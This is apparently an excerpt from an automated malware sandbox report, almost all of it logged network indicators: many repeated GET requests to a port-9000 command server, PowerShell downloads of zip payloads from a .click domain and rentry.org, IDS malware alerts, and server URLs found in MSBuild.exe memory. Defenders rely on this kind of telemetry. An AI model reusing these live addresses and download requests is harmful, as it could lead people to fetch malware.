                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 92.255.85.36 92.255.85.36
                            Source: Joe Sandbox ViewASN Name: SOVTEL-ASRU SOVTEL-ASRU
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49784 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49785 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49786 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49789 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49788 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49792 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49795 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49796 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49798 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49794 -> 92.255.85.36:9000
                            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49724 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49715 -> 164.132.58.105:443
                            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49717 -> 164.132.58.105:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49717 -> 164.132.58.105:443
                            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49718 -> 188.114.97.3:443
                            Source: global trafficHTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.org
                            Source: global trafficHTTP traffic detected: GET /archive.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.clickConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /Download_StarW3_pack.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.click
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.36
                            Source: global trafficHTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.org
                            Source: global trafficHTTP traffic detected: GET /archive.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.clickConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /Download_StarW3_pack.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.click
                            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: rentry.org
                            Source: global trafficDNS traffic detected: DNS query: main-connection.click
                            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.36:
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.00000000027BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.36:9000
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2491991927.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P
                            Source: MSBuild.exe, 0000000E.00000002.2497394754.000000000280D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.85.36:9000t-
